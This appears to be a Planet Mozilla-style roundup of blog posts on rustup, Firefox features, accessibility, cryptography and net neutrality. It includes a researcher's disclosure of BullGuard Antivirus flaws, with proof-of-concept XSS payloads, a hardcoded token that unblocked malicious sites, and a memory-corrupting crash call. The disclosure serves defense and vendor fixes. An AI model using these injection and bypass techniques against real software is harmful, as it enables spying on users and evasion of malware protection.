This Week in Rust is edited by: nellshamrell, llogiq, and cdmistman.

Discuss on r/rust

The Rust Programming Language BlogAnnouncing Rustup 1.22.1

The rustup working group is happy to announce the release of rustup version 1.22.1. Rustup is the recommended tool to install Rust, a programming language that is empowering everyone to build reliable and efficient software.

If you have a previous version of rustup installed, getting rustup 1.22.1 may be as easy as closing your IDE and running:

rustup self update

Rustup will also automatically update itself at the end of a normal toolchain update:

rustup update

If you don't have it already, or if the 1.22.0 release of rustup caused you to experience the problem that 1.22.1 fixes, you can get rustup from the appropriate page on our website.

What's new in rustup 1.22.1

When updating dependency crates for 1.22.0, a change in behaviour of the url crate slipped in which caused env_proxy to cease to work with proxy data set in the environment. This is unfortunate since those of you who use rustup behind a proxy and have updated to 1.22.0 will now find that rustup may not work properly for you.

If you are affected by this, simply re-download the installer and run it. It will update your existing installation of Rust with no need to uninstall first.

Thanks

Thanks to Ivan Nejgebauer who spotted the issue, provided the fix, and made rustup 1.22.1 possible, and to Ben Chen who provided a fix for our website.

Mozilla Addons BlogNew Extensions in Firefox for Android Nightly (Previously Firefox Preview)

Firefox for Android Nightly (formerly known as Firefox Preview) is a sneak peek of the new Firefox for Android experience. The browser is being rebuilt based on GeckoView, an embeddable component for Android, and we are continuing to gradually roll out extension support.

Including the add-ons from our last announcement, there are currently nine Recommended Extensions available to users. The latest three additions are in Firefox for Android Nightly and will be available on Firefox for Android Beta soon:

Decentraleyes prevents your mobile device from making requests to content delivery networks (i.e. advertisers), and instead provides local copies of common libraries. In addition to the benefit of increased privacy, Decentraleyes also reduces bandwidth usage—a huge benefit in the mobile space.

Privacy Possum has a unique approach to dealing with trackers. Instead of playing along with the cat and mouse game of removing trackers, it falsifies the information trackers used to create a profile of you, in addition to other anti-tracking techniques.

Youtube High Definition gives you more control over how videos are displayed on Youtube. You have the opportunity to set your preferred visual quality option and have it shine on your high-DPI device, or use a lower quality to save bandwidth.

If you have more questions on extensions in Firefox for Android Nightly, please check out our FAQ. We will be posting further updates about our future plans on this blog.

The post New Extensions in Firefox for Android Nightly (Previously Firefox Preview) appeared first on Mozilla Add-ons Blog.

Hacks.Mozilla.OrgAdding prefers-contrast to Firefox

In this article, we’ll walk through the design and implementation of the prefers-contrast media query in Firefox. We’ll start by defining high contrast mode, then we’ll cover the importance of prefers-contrast. Finally, we’ll walk through the media query implementation in Firefox. By the end, you’ll have a greater understanding of how media queries work in Firefox, and why the prefers-contrast query is important and exciting.

When we talk about the contrast of a page we’re assessing how the web author’s color choices impact readability. For visitors with low vision, web pages with low or insufficient contrast can be hard to use. The lack of distinction between text and its background can cause them to “bleed” together.

The What of prefers-contrast

Though the WCAG (Web Content Accessibility Guidelines) set standards for contrast that authors should abide by, not all sites do. To keep the web accessible, many browsers and OSes offer high-contrast settings to change how web pages and content looks. When these settings are enabled we say that a website visitor has high contrast mode enabled.

High contrast mode increases the contrast of the screen so that users with low vision have an easier time getting around. Depending on what operating system is being used, high contrast mode can make a wide variety of changes. It can reduce the visual complexity of the screen, force high contrast colors between text and backgrounds, apply filters to the screen, and more. Doing this all automatically and in a way that works for every application and website is hard.

For example, how should high contrast mode handle images? Photos taken in high or low light may lack contrast, and their subjects may be hard to distinguish. What about text that is set on top of images? If the image isn’t a single color, some parts may have high contrast, but others may not. At the moment, Firefox deals with text on images by drawing a backplate on the text. All this is great, but it’s still not quite ideal. Ideally, webpages could detect when high contrast mode is enabled and then make themselves more accessible. To do that we need to know how different operating systems implement high contrast mode.

OS-level high-contrast settings

Most operating systems offer high-contrast settings. On macOS, users can indicate that they’d prefer high contrast in System Preferences → Accessibility → Display. To honor this preference, macOS applies a high contrast filter to the screen. However, it won’t do anything to inform applications that high contrast is enabled or adjust the layout of the screen. This makes it hard for apps running on macOS to adjust themselves for high-contrast mode users. Furthermore, it means that users are completely dependent on the operating system to make the right modifications.

Windows takes a very different approach. When high contrast mode is enabled, Windows exposes this information to applications. Rather than apply a filter to the screen, it forces applications to use certain high contrast (or user-defined) colors. Unlike macOS, Windows also tells applications when high-contrast settings are enabled. In this way, applications can adjust themselves to be more high-contrast friendly.

Similarly, Firefox lets users customize high contrast colors or apply different colors to web content. This option can be enabled via the colors option under “Language and Appearance” in Firefox’s “Preferences” settings on all operating systems. When we talk about colors set by the user instead of by the page or application, we describe them as forced.

Forced colors in Firefox

a screenshot of Firefox Forced Colors Menu on a dark background

As we can see, different operating systems handle high-contrast settings in different ways. This impacts how prefers-contrast works on these platforms. On Windows, because Firefox is told when a high-contrast theme is in use, prefers-contrast can detect both high contrast from Windows and forced colors from within Firefox. On macOS, because Firefox isn’t told when a high-contrast theme is in use, prefers-contrast can only detect when colors are being forced from within the browser.

Want to see what something with forced colors looks like? Here is the Google homepage on Firefox with the default Windows high-contrast theme enabled:

google homepage with windows high contrast mode enabled

Notice how Firefox overrides the background colors (forced) to black and overrides outlines to yellow.

Some things are left to be desired by this forced colors approach. On the Google homepage above, you’ll notice that the profile image no longer appears next to the sign-in button. Here’s the Amazon homepage, also in Firefox, with the same Windows high-contrast theme enabled:

screenshot of high-contrast Amazon homepage with dark background

The images under “Ride electric” and “Current customer favorites” have disappeared, and the text in the “Father’s Day deals” section has not increased in contrast.

The Why of prefers-contrast

We can’t fault Google and Amazon for the missing images and other issues in the appearance of these high-contrast homepages. Without the prefers-contrast media query, there is no standardized way to detect a visitor’s contrast preferences. Even if Google and Amazon wanted to change their webpages to make them more accessible for different contrast preferences, they couldn’t. They have no way of knowing when a user has high-contrast mode enabled, even though the browser can tell.

That’s why prefers-contrast is so important. The prefers-contrast media query allows website authors to determine a visitor’s contrast preferences and update the website accordingly. Using prefers-contrast, a website author can differentiate between low and high contrast and detect when colors are being forced like this:

@media (prefers-contrast: forced) {
    /* some awesome, accessible, high contrast css */
}

This is great because well-informed website designers are much better at making their webpages accessible than automatic high contrast settings.

The How of prefers-contrast

This section covers how something like prefers-contrast actually gets implemented in Firefox. It’s an interesting dive into the internals of a browser, but if you’re just interested in the what and why of prefers-contrast then you’re welcome to move on to the conclusion.

Parsing

We’ll start our media query implementation journey with parsing. Parsing handles turning CSS and HTML into an internal representation that the browser understands. Firefox uses a browser engine called Servo to handle this. Luckily for us, Servo makes things pretty straightforward. To hook up parsing for our media query, we’ll head over to media_features.rs in the Servo codebase and we’ll add an enum to represent our media query.

/// Possible values for prefers-contrast media query.
/// https://drafts.csswg.org/mediaqueries-5/#prefers-contrast
#[derive(Clone, Copy, Debug, FromPrimitive, PartialEq, Parse, ToCss)]
#[repr(u8)]
#[allow(missing_docs)]
enum PrefersContrast {
    High,
    Low,
    NoPreference,
    Forced,
}

Because we use #[derive(Parse)], Stylo will take care of generating the parsing code for us using the name of our enum and its options. It is seriously that easy. :-)

Evaluating the media query

Now that we’ve got our parsing logic hooked up, we’ll add some logic for evaluating our media query. If prefers-contrast only exposed low, no-preference, and high, then this would be as simple as creating some function that returns an instance of our enum above.

That said, the addition of a forced option adds some interesting gotchas to our media query. It’s not possible to simultaneously prefer low and high contrast. However, it’s quite common for website visitors to prefer high contrast and have forced colors. As we discussed earlier, if a visitor is on Windows, enabling high contrast also forces colors on webpages. Because enums can only be in one of their states at a time (i.e., the prefers-contrast enum can’t be high-contrast and forced simultaneously) we’ll need to make some modifications to the single-function design.

To properly represent prefers-contrast, we’ll split our logic in half. The first half will determine if colors are being forced and the second will determine the website visitor’s contrast preference. We can represent the presence or absence of forced colors with a boolean, but we’ll need a new enum for contrast preference. Let’s go ahead and add that to media_features.rs:

/// Represents the parts of prefers-contrast that explicitly deal with
/// contrast. Used in combination with information about whether or not
/// forced colors are active, this allows for evaluation of the
/// prefers-contrast media query.
#[derive(Clone, Copy, Debug, FromPrimitive, PartialEq)]
#[repr(u8)]
pub enum ContrastPref {
    /// High contrast is preferred. Corresponds to an accessibility theme
    /// being enabled or firefox forcing high contrast colors.
    High,
    /// Low contrast is preferred. Corresponds to the
    /// browser.display.prefers_low_contrast pref being true.
    Low,
    /// The default value if neither high nor low contrast is enabled.
    NoPreference,
}

Voila! We have parsing and enums to represent the possible states of the prefers-contrast media query and a website visitor’s contrast preference done.

Adding functions in C++ and Rust

Now we add some logic to make prefers-contrast tick. We’ll do that in two steps. First, we’ll add a C++ function to determine contrast preferences, and then we’ll add a Rust function to call it and evaluate the media query.

Our C++ function will live in Gecko, Firefox’s layout engine. Information about high contrast settings is also collected in Gecko. This is quite handy for us. We’d like our C++ function to return our ContrastPref enum from earlier. Let’s start by generating bindings from Rust to C++ for that.

Starting in ServoBindings.toml we’ll add a mapping from our Stylo type to a Gecko type:

cbindgen-types = [
    # ...
    { gecko = "StyleContrastPref", servo = "gecko::media_features::ContrastPref" },
    # ...
]

Then, we’ll add a similar thing to Servo’s cbindgen.toml:

include = [
    # ...
    "ContrastPref",
    # ...
]

And with that, we’ve done it! cbindgen will generate the bindings so we have an enum to use and return from C++ code.

Our C++ function is relatively straightforward. We’ll move over to nsMediaFeatures.cpp and add it. If the browser is resisting fingerprinting, we’ll return no-preference. Otherwise, we’ll return high or no-preference based on whether or not high contrast mode is enabled (UseAccessibilityTheme).

StyleContrastPref Gecko_MediaFeatures_PrefersContrast(const Document* aDocument, const bool aForcedColors) {
    if (nsContentUtils::ShouldResistFingerprinting(aDocument)) {
        return StyleContrastPref::NoPreference;
    }
    // Neither Linux, Windows, nor Mac has a way to indicate that low
    // contrast is preferred so the presence of an accessibility theme
    // implies that high contrast is preferred.
    //
    // Note that MacOS does not expose whether or not high contrast is
    // enabled so for MacOS users this will always evaluate to
    // false. For more information and discussion see:
    // https://github.com/w3c/csswg-drafts/issues/3856#issuecomment-642313572
    // https://github.com/w3c/csswg-drafts/issues/2943
    if (!!LookAndFeel::GetInt(LookAndFeel::IntID::UseAccessibilityTheme, 0)) {
        return StyleContrastPref::High;
    }
    return StyleContrastPref::NoPreference;
}

Aside: This implementation doesn’t have a way to detect a preference for low contrast. As we discussed earlier neither Windows, macOS, nor Linux has a standard way to indicate that low contrast is preferred. Thus, for our initial implementation, we opted to keep things simple and make it impossible to toggle. That’s not to say that there isn’t room for improvement here. There are various less standard ways for users to indicate that they prefer low contrast — like forcing low contrast colors on Windows, Linux, or in Firefox.

Determining contrast preferences in Firefox

Finally, we’ll add the function definition to GeckoBindings.h so that our Rust code can call it.

mozilla::StyleContrastPref Gecko_MediaFeatures_PrefersContrast(
    const mozilla::dom::Document*, const bool aForcedColors);

Now that parsing, logic, and C++ bindings are set up, we’re ready to add our Rust function for evaluating the media query. Moving back over to media_features.rs, we’ll go ahead and add a function to do that.

Our function takes a device with information about where the media query is being evaluated. It also takes an optional query value, representing the value that the media query is being evaluated against. The query value is optional because sometimes the media query can be evaluated without a query. In this case, we evaluate the truthiness of the contrast preference that we would normally compare to the query. This is called evaluating the media query in the “boolean context”. If the contrast preference is anything other than no-preference, we go ahead and apply the CSS inside of the media query.

Contrast preference examples

That’s a lot of information, so here are some examples:

@media (prefers-contrast: high) { } /* query_value: Some(high) */
@media (prefers-contrast: low) { } /* query_value: Some(low) */
@media (prefers-contrast) { } /* query_value: None | "eval in boolean context" */

In the boolean context (the third example above) we first determine the actual contrast preference. Then, if it’s not no-preference the media query will evaluate to true and apply the CSS inside. On the other hand, if it is no-preference, the media query evaluates to false and we don’t apply the CSS.

With that in mind, let’s put together the logic for our media query!

fn eval_prefers_contrast(device: &Device, query_value: Option<PrefersContrast>) -> bool {
    let forced_colors = !device.use_document_colors();
    let contrast_pref =
        unsafe { bindings::Gecko_MediaFeatures_PrefersContrast(device.document(), forced_colors) };
    if let Some(query_value) = query_value {
        match query_value {
            PrefersContrast::Forced => forced_colors,
            PrefersContrast::High => contrast_pref == ContrastPref::High,
            PrefersContrast::Low => contrast_pref == ContrastPref::Low,
            PrefersContrast::NoPreference => contrast_pref == ContrastPref::NoPreference,
        }
    } else {
        // Only prefers-contrast: no-preference evaluates to false.
        forced_colors || (contrast_pref != ContrastPref::NoPreference)
    }
}

The last step is to register our media query with Firefox. Still in media_features.rs, we add our evaluator function and enum to the media features list so that Stylo knows about prefers-contrast:

pub static MEDIA_FEATURES: [MediaFeatureDescription; 54] = [
    // ...
    feature!(
        atom!("prefers-contrast"),
        AllowsRanges::No,
        keyword_evaluator!(eval_prefers_contrast, PrefersContrast),
        // Note: by default this is only enabled in browser chrome and
        // ua. It can be enabled on the web via the
        // layout.css.prefers-contrast.enabled preference. See
        // disabled_by_pref in media_feature_expression.rs for how that
        // is done.
        ParsingRequirements::empty(),
    ),
    // ...
];

In conclusion

And with that, we’ve finished! With some care, we’ve walked through a near-complete implementation of prefers-contrast in Firefox. Triggered updates and tests are not covered, but are relatively small details. If you’d like to see all of the code and tests for prefers-contrast take a look at the Phabricator patch here.

prefers-contrast is a powerful and important media query that makes it easier for web authors to create accessible web pages. Using prefers-contrast websites can adjust to high and forced contrast preferences in ways that they were entirely unable to before. To get prefers-contrast, grab a copy of Firefox Nightly and set layout.css.prefers-contrast.enabled to true in about:config. Now, go forth and build a more accessible web! 🎉

Mozilla works to make the internet a global public resource that is open and accessible to all. The prefers-contrast media query, and other work by our accessibility team, ensures we uphold that commitment to our low-vision users and other users with disabilities. If you’re interested in learning more about Mozilla’s accessibility work you can check out the accessibility blog or the accessibility wiki page.

The post Adding prefers-contrast to Firefox appeared first on Mozilla Hacks - the Web developer blog.

Frederik BraunHardening Firefox against Injection Attacks – The Technical Details

This blog post has first appeared on the Mozilla Attack & Defense blog and was co-authored with Christoph Kerschbaumer and Tom Ritter

In a recent academic publication titled Hardening Firefox against Injection Attacks (to appear at SecWeb – Designing Security for the Web) we describe techniques which we have incorporated into Firefox …

Mozilla AccessibilityBroadening Our Impact

Last year, the accessibility team worked to identify and fix gaps in our screen reader support, as well as on some new areas of focus, like improving Firefox for users with low vision. As a result, we shipped some great features. In addition, we’ve begun building awareness across Mozilla and putting in place processes to help ensure delightful accessibility going forward, including a Firefox wide triage process.

With a solid foundation for delightful accessibility well underway, we’re looking at the next step in broadening our impact: expanding our engagement with our passionate, global community. It’s our hope that we can get to a place where a broad community of interested people become active participants in the planning, design, development and testing of Firefox accessibility. To get there, the first step is open communication about what we’re doing and where we’re headed.

To that end, we’ve created this blog to keep you all informed about what’s going on with Firefox accessibility. As a second step, we’ve published the Firefox Accessibility Roadmap. This document is intended to communicate our ongoing work, connecting the dots from our aspirations, as codified in our Mission and Manifesto, through our near term strategy, right down to the individual work items we’re tackling today. The roadmap will be updated regularly to cover at least the next six months of work and ideally the next year or so.

Another significant area of new documentation, pushed by Eitan and Morgan, is around our ongoing work to bring VoiceOver support to Firefox on macOS. In addition to the overview wiki page, which covers our high level plan and specific lists of bugs we’re targeting, there’s also a work in progress architectural overview and a technical guide to contributing to the Mac work.

We’ve also transitioned most of our team technical discussions from a closed Mozilla Slack to the open and participatory Matrix instance. Some exciting conversations are already happening and we hope that you’ll join us.

And that’s just the beginning. We’re always improving our documentation and onboarding materials so stay tuned to this channel for updates. We hope you find access to the team and the documents useful and that if something in our docs calls out to you that you’ll find us on Matrix and help out, whether that’s contributing ideas for better solutions to problems we’re tackling, writing code for features and fixes we need, or testing the results of development work.

We look forward to working with you all to make the Firefox family of products and services the best they can be, a delight to use for everyone, especially people with disabilities.

The post Broadening Our Impact appeared first on Mozilla Accessibility.

Mozilla Open Policy & Advocacy BlogNext Steps for Net Neutrality

Two years ago we first brought Mozilla v. FCC in federal court, in an effort to save the net neutrality rules protecting American consumers. Mozilla has long fought for net neutrality because we believe that the internet works best when people control their own online experiences.

Today is the deadline to petition the Supreme Court for review of the D.C. Circuit decision in Mozilla v. FCC. After careful consideration, Mozilla—as well as its partners in this litigation—are not seeking Supreme Court review of the D.C. Circuit decision. Even though we did not achieve all that we hoped for in the lower court, the court recognized the flaws of the FCC’s action and sent parts of it back to the agency for reconsideration. And the court cleared a path for net neutrality to move forward at the state level. We believe the fight is best pursued there, as well as on other fronts including Congress or a future FCC.

Net neutrality is more than a legal construct. It is a reflection of the fundamental belief that ISPs have tremendous power over our online experiences and that power should not be further concentrated in actors that have often demonstrated a disregard for consumers and their digital rights. The global pandemic has moved even more of our daily lives—our work, school, conversations with friends and family—online. Internet videos and social media debates are fueling an essential conversation about systemic racism in America. At this moment, net neutrality protections ensuring equal treatment of online traffic are critical. Recent moves by ISPs to favor their own content channels or impose data caps and usage-based pricing make concerns about the need for protections all the more real.

The fight for net neutrality will continue on. The D.C. Circuit decision positions the net neutrality movement to continue on many fronts, starting with a defense of California’s strong new law to protect consumers online—a law that was on hold pending resolution of this case.

Other states have followed suit and we expect more to take up the mantle. We will look to a future Congress or future FCC to take up the issue in the coming months and years. Mozilla is committed to continuing our work, with our broad community of allies, in this movement to defend the web and consumers and ensure the internet remains open and accessible to all.

The post Next Steps for Net Neutrality appeared first on Open Policy & Advocacy.

Mozilla Security BlogPerformance Improvements via Formally-Verified Cryptography in Firefox

Cryptographic primitives, while extremely complex and difficult to implement, audit, and validate, are critical for security on the web. To ensure that NSS (Network Security Services, the cryptography library behind Firefox) abides by Mozilla’s principle of user security being fundamental, we’ve been working with Project Everest and the HACL* team to bring formally-verified cryptography into Firefox.

In Firefox 57, we introduced formally-verified Curve25519, which is a mechanism used for key establishment in TLS and other protocols. In Firefox 60, we added ChaCha20 and Poly1305, providing high-assurance authenticated encryption. Firefox 69, 77, and 79 improve and expand these implementations, providing increased performance while retaining the assurance granted by formal verification.

Performance & Specifics

For key establishment, we recently replaced the 32-bit implementation of Curve25519 with one from the Fiat-Crypto project. The arbitrary-precision arithmetic functions of this implementation are proven to be functionally correct, and it improves performance by nearly 10x over the previous code. Firefox 77 updates the 64-bit implementation with new HACL* code, benefitting from a ~27% speedup. Most recently, Firefox 79 also brings this update to Windows. These improvements are significant: Telemetry shows Curve25519 to be the most widely used elliptic curve for ECDH(E) key establishment in Firefox, and increased throughput reduces energy consumption, which is particularly important for mobile devices.

64-bit Curve25519 with HACL*

32-bit Curve25519 with Fiat-Crypto

For encryption and decryption, we improved the performance of ChaCha20-Poly1305 in Firefox 77. Throughput is doubled by taking advantage of vectorization with 128-bit and 256-bit integer arithmetic (via the AVX2 instruction set on x86-64 CPUs). When these features are unavailable, NSS will fall back to an AVX or scalar implementation, both of which have been further optimized.

ChaCha20-Poly1305 with HACL* and AVX2

The HACL* project has introduced new techniques and libraries to improve efficiency in writing verified primitives for both scalar and vectorized variants. This allows aggressive code sharing and reduces the verification effort across many different platforms.

What’s Next?

For Firefox 81, we intend to incorporate a formally-verified implementation of the P256 elliptic curve for ECDSA and ECDH. Middle-term targets for verified implementations include GCM, the P384 and P521 elliptic curves, and the ECDSA signature scheme itself. While there remains work to be done, these updates provide an improved user experience and ease the implementation burden for future inclusion of platform-optimized primitives.

The post Performance Improvements via Formally-Verified Cryptography in Firefox appeared first on Mozilla Security Blog.

Wladimir PalantDismantling BullGuard Antivirus' online protection

Just like so many other antivirus applications, BullGuard antivirus promises to protect you online. This protection consists of the three classic components: protection against malicious websites, marking of malicious search results and BullGuard Secure Browser for your special web surfing needs. As so often, this functionality comes with issues of its own, some being unusually obvious.

Chihuahua looking into a mirror and seeing a bulldog (BullGuard logo) there<figcaption> Image credits: BullGuard, kasiagrafik, GDJ, rygle </figcaption>

Summary of the findings

The first and very obvious issue was found in the protection against malicious websites. While this functionality often cannot be relied upon, circumventing it typically requires some effort. Not so with BullGuard Antivirus: merely adding a hardcoded character sequence to the address would make BullGuard ignore a malicious domain.

Further issues affected BullGuard Secure Browsers: multiple Cross-Site Scripting (XSS) vulnerabilities in its user interface potentially allowed websites to spy on the user or crash the browser. The crash might be exploitable for Remote Code Execution (RCE). Proper defense in depth prevented worse here.

Online protection approach

BullGuard Antivirus listens in on all connections made by your computer. For some of these connections it will get between the server and the browser in order to manipulate server responses. That’s especially the case for malicious websites of course, but the server response for search pages will also be manipulated in order to indicate which search results are supposed to be trustworthy.

'Link safe' message showing next to Yahoo! link on Google Search

To implement this pop-up, the developers used an interesting trick: connections to port 3220 will always be redirected to the antivirus application, no matter which domain. So navigating to http://www.yahoo.com:3220/html?eWFob28uY29t will yield the following response:

'Link safe' message showing up under the address http://www.yahoo.com:3220/html?eWFob28uY29t
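The path and query string appear to encode the domain being checked as Base64 (an observation based on the URL above, not documented behavior):

// In a browser console: the parameter from the URL above decodes to the
// domain whose reputation is shown.
atob('eWFob28uY29t'); // "yahoo.com"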

This approach is quite dangerous: a vulnerability in the content served up here would be exploitable in the context of any domain on the web. I’ve seen such Universal XSS vulnerabilities before. In BullGuard’s case, however, none of the content served appears to be vulnerable. It would still be a good idea to avoid the unnecessary risk: the server could respond to http://localhost:3220/ only and use CORS appropriately.

Unblocking malicious websites

To be honest, I couldn’t find a malicious website that BullGuard Antivirus would block. So I cheated and added malware.wicar.org to the block list in the application’s settings. Navigating to the site now resulted in a redirect to bullguard.com:

Warning page originating at safebrowsing.bullguard.com indicating that malware.wicar.org is blocked

If you click “More details” you will see a link labeled “Continue to website. NOT RECOMMENDED” at the bottom. So far so good: making it complicated and discouraged to override the warning is sane user interface design. But how does that link work?

Each antivirus application came up with its own individual answer to this question. Some answers turned out more secure than others, but BullGuard’s is still rather unique. The warning page will send you to https://malware.wicar.org/?gid=13fd117f-bb07-436e-85bb-f8a3abbd6ad6 and this gid parameter will tell BullGuard Antivirus to unblock malware.wicar.org for the current session. Where does its value come from? It’s hardcoded in BullGuardFiltering.exe. Yes, it’s exactly the same value for any website and any BullGuard install.

So if someone were to run a malicious email campaign and they were concerned about BullGuard blocking the link to https://malicious.example.com/ – no problem, changing the link into https://malicious.example.com/?gid=13fd117f-bb07-436e-85bb-f8a3abbd6ad6 would disable antivirus protection.

The current BullGuard Antivirus release uses a hid parameter whose value depends on the website and the current session. So neither predicting its value nor reusing a value from one website to unblock another should work any more.

XSSing the secure browser

Unlike some other antivirus solutions, BullGuard doesn’t market their BullGuard Secure Browser as an online banking browser. Instead, they seem to suggest that it is good enough for everyday use – if you can live with a horrible user experience, that is. It’s a Chromium-based browser which “protects you from vulnerable and malicious browser extensions” by not supporting any browser extensions.

Unlike Chromium’s, this browser’s user interface is a collection of various web pages. For example, secure://address_bar.html is the location bar and secure://find_in_page.html the find bar. All pages rely heavily on HTML manipulation via jQuery, so you are probably not surprised that there are cross-site scripting vulnerabilities here.

Vulnerability in the location bar

The code displaying search suggestions when you type something into the location bar went like this:

else if (vecFields[i].type == 3) {
    var string_search = BG_TRANSLATE_String('secure_addressbar_search');
    // type is search with Google
    strHtml += '><img src="' + vecFields[i].icon +
        '" alt="favicon" class="address_drop_favicon"/> ' +
        '<p class="address_drop_text"><span class="address_search_terms">' +
        vecFields[i].title + '</span><span class="address_search_provider"> - ' +
        string_search + '</span></p>';
}

No escaping performed here, so if you type something like <img src=x onerror=alert(document.location)> into the location bar, you will get JavaScript code executing in the context of secure://address_bar.html. Not only will the code stay there for the duration of the current browser session, it will be able to spy on location bar changes. Ironically, BullGuard’s announcement claims that their browser protects against man-in-the-browser attacks, which is exactly what this is.

You think that no user would be stupid enough to copy untrusted code into the location bar, right? But regular users have no reason to expect the world to explode simply because they typed in something. That’s why no modern browser allows typing in javascript: addresses any more. And javascript: addresses are far less problematic than the attack depicted here.
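For comparison, here is a minimal sketch of how such a suggestion row could be built with DOM APIs so that untrusted input is treated as text rather than markup. This is my own illustration, not BullGuard's actual fix:

// Sketch: build one suggestion row without concatenating untrusted strings into HTML.
function buildSuggestionRow(title, searchLabel) {
  const row = document.createElement('p');
  row.className = 'address_drop_text';

  const terms = document.createElement('span');
  terms.className = 'address_search_terms';
  terms.textContent = title; // whatever the user typed stays plain text

  const provider = document.createElement('span');
  provider.className = 'address_search_provider';
  provider.textContent = ' - ' + searchLabel;

  row.append(terms, provider);
  return row;
}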

Vulnerability in the display of blocked popups

The address bar issue isn’t the only or even the most problematic XSS vulnerability. The page secure://blocked-popups.html runs the following code:

var li = $('<li/>')
    .addClass('bg_blocked_popups-item')
    .attr('onclick', 'jsOpenPopup(\''+ list[i] + '\', '+ i + ');')
    .appendTo(cList);

No escaping performed here either, so a malicious website only needs to use single quotation marks in the pop-up address:

window.open(`/document/download.pdf#'+alert(location.href)+'`, "_blank");

That’s it, the browser will now indicate a blocked pop-up.

'Pop-ups blocked' message displayed in location bar

And if the user clicks this message, the injected code runs: a message appears indicating that arbitrary JavaScript is now executing in the context of secure://blocked-popups.html. That code can, for example, call window.bgOpenPopup(), which allows it to open arbitrary URLs, even data: URLs that normally cannot be opened by websites. It could even open an ad page every few minutes, and the only way to get rid of it would be restarting the browser.

But the purpose of the window.bgOpenPopup() function isn’t merely allowing the pop-up, it also removes a blocked pop-up from the list – by position, without any checks to ensure that the index is valid. So calling window.bgOpenPopup("...", 100000) will crash the browser – this is an access violation. Use a smaller index and the operation will “succeed,” corrupting memory and probably allowing remote code execution.

And finally, this vulnerability allows calling the window.bgOnElementRectMeasured() function, setting the size of this pop-up to an arbitrary value. This allows displaying the pop-up on top of the legitimate browser user interface and showing a fake user interface there. In theory, malicious code could conjure up a fake location bar and content area, messing with any website loaded and exfiltrating data. Normally, browsers have visual clues to clearly separate their user interface from the content area, but these would be useless here. Also, it would be comparatively easy to make the fake user interface look convincing, as this page can access the CSS styles used for the real interface.

What about all the other API functions?

While the above is quite bad, BullGuard Secure Browser exposes a number of other functions to its user interface. However, it seems that these can only be used by the pages which actually need them. So the blocked pop-ups page cannot use anything other than window.bgOpenPopup() and window.bgOnElementRectMeasured(). That’s proper defense in depth and it prevented worse here.

Conclusions

BullGuard simply hardcoding security tokens isn’t an issue I’ve seen before. It should be obvious that websites cannot be allowed to disable security features, and yet it seems that the developers somehow didn’t consider this attack vector at all.

The other conclusion isn’t new but worth repeating: if you build a “secure” product, you should use a foundation that eliminates the most common classes of vulnerabilities. There is no reason why a modern day application should have XSS vulnerabilities in its user interface, and yet it happens all the time.
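To illustrate the point with the blocked-popups example from above: the same list entry could be created with jQuery's text() and an event handler closure instead of concatenating the URL into HTML and into an inline onclick string. This is only a sketch of a possible fix, not BullGuard's actual patch:

// Sketch: keep the untrusted pop-up URL out of HTML and out of handler strings.
// jsOpenPopup() is the page's existing function from the code shown earlier.
function addBlockedPopupItem(cList, url, index) {
  $('<li/>')
    .addClass('bg_blocked_popups-item')
    .text(url)                                   // rendered as text only
    .on('click', () => jsOpenPopup(url, index))  // closure instead of onclick string
    .appendTo(cList);
}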

Timeline

  • 2020-04-09: Started looking for a vulnerability disclosure process on BullGuard website, found none. Asked on Twitter, without success.
  • 2020-04-10: Sent an email to security@ address, bounced. Contacted mail@ support address asking how vulnerabilities are supposed to be reported.
  • 2020-04-10: Response asks for “clarification.”
  • 2020-04-11: Sent a slightly reformulated question.
  • 2020-04-11: Response tells me to contact feedback@ address with “application-related feedback.”
  • 2020-04-12: Sent the same inquiry to feedback@ support address.
  • 2020-04-15: Received apology for the “unsatisfactory response” and was told to report the issues via this support ticket.
  • 2020-04-15: Sent report about circumventing protection against malicious websites.
  • 2020-04-17: Sent report about XSS vulnerabilities in BullGuard Secure Browser (delay due to miscommunication).
  • 2020-04-17: Protection circumvention vulnerability confirmed and considered critical.
  • 2020-04-23: Told that the HTML attachment (proof of concept for the XSS vulnerability) was rejected by the email system, resent the email with a 7zip-packed attachment.
  • 2020-05-04: XSS vulnerabilities confirmed and considered critical.
  • 2020-05-18: XSS vulnerabilities fixed in 20.0.378 Hotfix 2.
  • 2020-06-29: Protection circumvention vulnerability fixed in 20.0.380 Hotfix 2 (release announcement wrongly talks about “XSS vulnerabilities in Secure Browser” again).
  • 2020-06-07: Got reply from the vendor that publishing the details one week before deadline is ok.

Firefox UXUX Book Club Recap: Writing is Designing, in Conversation with the Authors

The Firefox UX book club comes together a few times a year to discuss books related to the user experience practice. We recently welcomed authors Michael Metts and Andy Welfle to discuss their book Writing is Designing: Words and the User Experience (Rosenfeld Media, Jan. 2020).

Photo of Writing is Designing with notebook, coffee cup, and computer mouse on a table.

To make the most of our time, we collected questions from the group beforehand, organized them into themes, and asked people to upvote the ones they were most interested in.

An overview of Writing is Designing

“In many product teams, the words are an afterthought, and come after the “design,” or the visual and experiential system. It shouldn’t be like that: the writer should be creating words as the rest of the experience is developed. They should be iterative, validated with research, and highly collaborative. Writing is part of the design process, and writers are designers.” — Writing is Designing

Andy and Michael kicked things off with a brief overview of Writing is Designing. They highlighted how writing is about fitting words together and design is about solving problems. Writing as design brings the two together. These activities — writing and designing — need to be done together to create a cohesive user experience.

They reiterated that effective product content must be:

  • Usable: It makes it easier to do something. Writing should be clear, simple, and easy.
  • Useful: It supports user goals. Writers need to understand a product’s purpose and their audience’s needs to create useful experiences.
  • Responsible: What we write can be misused by people or even algorithms. We must take care in the language we use.

We then moved onto Q&A which covered these themes and ideas.

On writing a book that’s not just for UX writers

“Even if you only do this type of writing occasionally, you’ll learn from this book. If you’re a designer, product manager, developer, or anyone else who writes for your users, you’ll benefit from it. This book will also help people who manage or collaborate with writers, since you’ll get to see what goes into this type of writing, and how it fits into the product design and development process.” — Writing is Designing

You don’t have to be a UX writer or content strategist to benefit from Writing Is Designing. The book includes guidance for anyone involved in creating content for a user experience, including designers, researchers, engineers, and product managers. Writing is just as much of a design tool as Sketch or Figma—it’s just that the material is words, not pixels.

When language perpetuates racism

“The more you learn and the more you are able to engage in discussions about racial justice, the more you are able to see how it impacts everything we do. Not questioning systems can lead to perpetuating injustice. It starts with our workplaces. People are having important conversations and questioning things that already should have been questioned.” — Michael Metts

Given the global focus on racial justice issues, it wasn’t surprising that we spent a good part of our time discussing how the conversation intersects with our day-to-day work.

Andy talked about the effort at Adobe, where he is the UX Content Strategy Manager, to expose racist terminology in its products, such as ‘master-slave’ and ‘whitelist-blacklist’ pairings. It’s not just about finding a neutral replacement term that appears to users in the interface, but rethinking how we’ve defined these terms and underlying structures entirely in our code.

